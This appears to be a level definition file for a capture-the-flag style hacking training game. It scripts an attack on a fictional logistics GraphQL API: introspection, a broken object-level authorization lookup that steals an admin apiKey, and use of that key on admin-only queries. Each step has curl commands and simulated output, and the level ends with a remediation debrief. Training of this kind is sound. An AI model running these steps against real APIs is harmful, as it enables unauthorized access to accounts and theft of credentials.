import type { ChainDef } from "../../types";
import { match, strictCmd } from "../../engine";

const IP = "192.0.2.110";
const GQL = `${IP}:4000/graphql`;
const SESSION = "sess_8f3ac194de";
const ADMIN_KEY = "wml_ak_7f2c9d3e8b41";

export const ghostLevel11: ChainDef = {
  id: "ghost-11",
  difficulty: "ghost",
  order: 11,
  points: 300,
  title: "The Schema Told You Everything",
  codename: "GHOST ASSESSMENT — THE SCHEMA TOLD YOU EVERYTHING",
  summary: "The client app only ever asks this API for what it needs. The API itself will describe everything it can do to anyone who asks it directly — including fields and operations the app never touches.",
  briefing: [
    `TARGET: Windmere Logistics — operations API — ${GQL}`,
    "YOU HAVE: a legitimate, low-privilege API account — driver12 : Roadway2025!",
    "",
    "No overflow, no forged signature this time. Just a GraphQL API that documents itself in full to",
    "anyone who queries its schema, and a couple of resolvers that trust a valid session more than they",
    "should.",
  ],
  debrief: [
    "root cause chain: Windmere's GraphQL API shipped with introspection enabled in production (CWE-200,",
    "information exposure) — revealing internal fields and operations (apiKey, systemStatus, systemFlag)",
    "that the client app deliberately never surfaced, but the server happily documented to anyone who",
    "asked. The userAccount(id) resolver only checked that the caller held *a* valid session — never",
    "that the id argument belonged to that session (broken object level authorization, OWASP API1:2023)",
    "— letting any authenticated account read any other account's record, apiKey included. The",
    "systemStatus/systemFlag admin operations then only checked that an apiKey argument was valid at",
    "all (broken function level authorization, OWASP API5:2023), never whose it was or what role that",
    "account actually held.",
    "",
    "WINDMERE LOGISTICS: SECURED.",
  ],
  nodes: [
    {
      id: "windmere",
      org: "Windmere Logistics",
      city: "Windmere",
      state: "OH",
      coords: { x: 44, y: 46 },
      ip: IP,
      tagline: "Regional freight operations platform",
      briefing: [`IP: ${IP}`, `API: ${GQL}`, "No further information provided."],
      initialPrompt: "op@breachline:~$",
      motd: [],
      objectives: [
        { id: "recon", label: "Enumerate open services on the target", tactic: "Reconnaissance" },
        { id: "identify", label: "Confirm the endpoint accepts GraphQL queries", tactic: "Discovery", requires: ["recon"] },
        { id: "login", label: "Authenticate and capture a valid session token", tactic: "Discovery", requires: ["identify"] },
        { id: "introspect", label: "Enumerate the full schema, including fields and operations the client app never uses", tactic: "Discovery", requires: ["login"] },
        {
          id: "confirm-bola",
          label: "Confirm the account-lookup query never verifies the id belongs to your own session",
          tactic: "Discovery",
          requires: ["introspect"],
        },
        { id: "steal-apikey", label: "Use the unchecked id lookup to read the admin account's own apiKey", tactic: "Credential Access", requires: ["confirm-bola"] },
        { id: "exploit", label: "Use the stolen apiKey against an undocumented admin-only operation", tactic: "Privilege Escalation", requires: ["steal-apikey"] },
        { id: "loot", label: "Recover proof of admin-level access", tactic: "Collection", requires: ["exploit"] },
        { id: "secure", label: "Disable introspection in production and add real object/function-level authorization checks", tactic: "Remediation", requires: ["loot"] },
      ],
      hints: [
        "a GraphQL schema isn't the same thing as an authorization boundary. introspection will describe every field and operation the server can execute, whether or not the client app you were handed ever calls it.",
        "if a query takes an id argument, try an id that isn't yours. a lot of resolvers check 'is this a valid session' and stop there — they never check 'does this session's own account actually own the id being requested.'",
        "once you've proven you can read anyone's record by id, find the id that belongs to an admin account and pull whatever credential field introspection revealed on it. then use that credential directly against whichever admin-only operations introspection also told you exist.",
      ],
      debrief: [],
      commands: [
        strictCmd({
          id: "nmap",
          tool: "nmap",
          requires: [IP],
          help: "nmap -sV <ip>",
          run: () => ({
            completesObjective: "recon",
            tone: "success",
            setsFlags: ["scanned"],
            output: [
              "PORT     STATE SERVICE VERSION",
              "4000/tcp open  http    graphql-api (Apollo Server)",
              "",
              "Nmap done: 1 IP address (1 host up) scanned in 4.10 seconds",
            ],
          }),
        }),
        strictCmd({
          id: "identify",
          tool: "curl",
          requires: [GQL, "__typename"],
          help: `curl -X POST http://${GQL} -H "Content-Type: application/json" -d '{"query":"{__typename}"}'`,
          requiresFlags: ["scanned"],
          run: () => ({
            completesObjective: "identify",
            tone: "success",
            setsFlags: ["have_endpoint"],
            output: ["HTTP/1.1 200 OK", "", '{"data":{"__typename":"Query"}}'],
          }),
        }),
        strictCmd({
          id: "login",
          tool: "curl",
          requires: [GQL, "mutation", "login", "driver12", "Roadway2025!"],
          help: `curl -X POST http://${GQL} -d '{"query":"mutation{login(user:\\"driver12\\",pass:\\"Roadway2025!\\"){token}}"}'`,
          requiresFlags: ["have_endpoint"],
          run: () => ({
            completesObjective: "login",
            tone: "success",
            setsFlags: ["have_session"],
            output: ["HTTP/1.1 200 OK", "", `{"data":{"login":{"token":"${SESSION}"}}}`],
          }),
        }),
        strictCmd({
          id: "introspect",
          tool: "curl",
          requires: [GQL, "__schema"],
          help: `curl -X POST http://${GQL} -H "Authorization: Bearer ${SESSION}" -d '{"query":"{__schema{types{name fields{name}}}}"}'`,
          requiresFlags: ["have_session"],
          run: () => ({
            completesObjective: "introspect",
            tone: "success",
            setsFlags: ["have_schema"],
            note: "Windmere graphql-api — schema exposes User.apiKey, Query.userAccount(id), Query.systemStatus(apiKey), Query.systemFlag(apiKey) — none of these appear in the client app",
            output: [
              'type User { id: ID username: String role: String apiKey: String }',
              "type Query {",
              "  userAccount(id: ID!): User",
              "  systemStatus(apiKey: String!): String",
              "  systemFlag(apiKey: String!): String",
              "  ... (12 more fields used by the client app)",
              "}",
              "",
              "[!] apiKey, userAccount(id), systemStatus, and systemFlag never appear anywhere in the",
              "    client app's own queries — introspection just handed you the entire private API surface.",
            ],
          }),
        }),
        strictCmd({
          id: "confirm-bola",
          tool: "curl",
          requires: [GQL, "userAccount", "id:3", SESSION],
          help: `curl -X POST http://${GQL} -H "Authorization: Bearer ${SESSION}" -d '{"query":"{userAccount(id:3){username role apiKey}}"}'`,
          requiresFlags: ["have_schema"],
          run: () => ({
            completesObjective: "confirm-bola",
            tone: "success",
            setsFlags: ["have_bola_confirmed"],
            note: "Windmere graphql-api — userAccount(id) returned another employee's full record over driver12's own session token",
            output: [
              "HTTP/1.1 200 OK",
              "",
              '{"data":{"userAccount":{"username":"jrivera","role":"employee","apiKey":"wml_ak_2b91ff004a"}}}',
              "",
              "[!] driver12's session token had no business reading jrivera's record at all — the resolver",
              "    never checked whether id:3 belonged to the account making the request.",
            ],
          }),
        }),
        strictCmd({
          id: "steal-apikey",
          tool: "curl",
          requires: [GQL, "userAccount", "id:1", SESSION],
          help: `curl -X POST http://${GQL} -H "Authorization: Bearer ${SESSION}" -d '{"query":"{userAccount(id:1){username role apiKey}}"}'`,
          requiresFlags: ["have_bola_confirmed"],
          run: () => ({
            completesObjective: "steal-apikey",
            tone: "success",
            setsFlags: ["have_admin_apikey"],
            note: `Windmere graphql-api — admin account ops_admin (id:1) apiKey: ${ADMIN_KEY}`,
            output: [
              "HTTP/1.1 200 OK",
              "",
              `{"data":{"userAccount":{"username":"ops_admin","role":"admin","apiKey":"${ADMIN_KEY}"}}}`,
            ],
          }),
        }),
        strictCmd({
          id: "exploit",
          tool: "curl",
          requires: [GQL, "systemStatus", ADMIN_KEY],
          help: `curl -X POST http://${GQL} -d '{"query":"{systemStatus(apiKey:\\"${ADMIN_KEY}\\")}"}'`,
          requiresFlags: ["have_admin_apikey"],
          deniedOutput: ["you need a valid admin apiKey before this operation returns anything but an authorization error."],
          run: () => ({
            completesObjective: "exploit",
            tone: "success",
            setsFlags: ["admin_access"],
            output: [
              "HTTP/1.1 200 OK",
              "",
              '{"data":{"systemStatus":"OK — all internal services nominal. build: 2024.11-internal"}}',
              "",
              "[+] systemStatus only ever checked that the apiKey argument was valid at all — never which",
              "    account it belonged to, or whether that account actually held the admin role.",
            ],
          }),
        }),
        strictCmd({
          id: "loot",
          tool: "curl",
          requires: [GQL, "systemFlag", ADMIN_KEY],
          help: `curl -X POST http://${GQL} -d '{"query":"{systemFlag(apiKey:\\"${ADMIN_KEY}\\")}"}'`,
          requiresFlags: ["admin_access"],
          run: () => ({
            completesObjective: "loot",
            tone: "success",
            note: "Windmere Logistics — flag: 8f14e45fceea167a5a36dedd4bea2543",
            output: ["HTTP/1.1 200 OK", "", '{"data":{"systemFlag":"8f14e45fceea167a5a36dedd4bea2543"}}'],
          }),
        }),
        {
          id: "secure",
          tool: "secure",
          match: match.startsWith("secure system", "secure", "remediate"),
          help: "secure system",
          requiresObjectives: ["loot"],
          deniedOutput: ["confirm admin-level access before you file the fix."],
          run: () => ({
            completesObjective: "secure",
            tone: "success",
            output: [
              "[+] disabled schema introspection in production",
              "[+] added ownership checks to userAccount(id) so a session can only ever read its own record",
              "[+] scoped systemStatus/systemFlag to require the admin role on the calling session, not just",
              "    a valid apiKey belonging to someone",
              "",
              "WINDMERE LOGISTICS: SECURED",
            ],
          }),
        },
      ],
    },
  ],
};
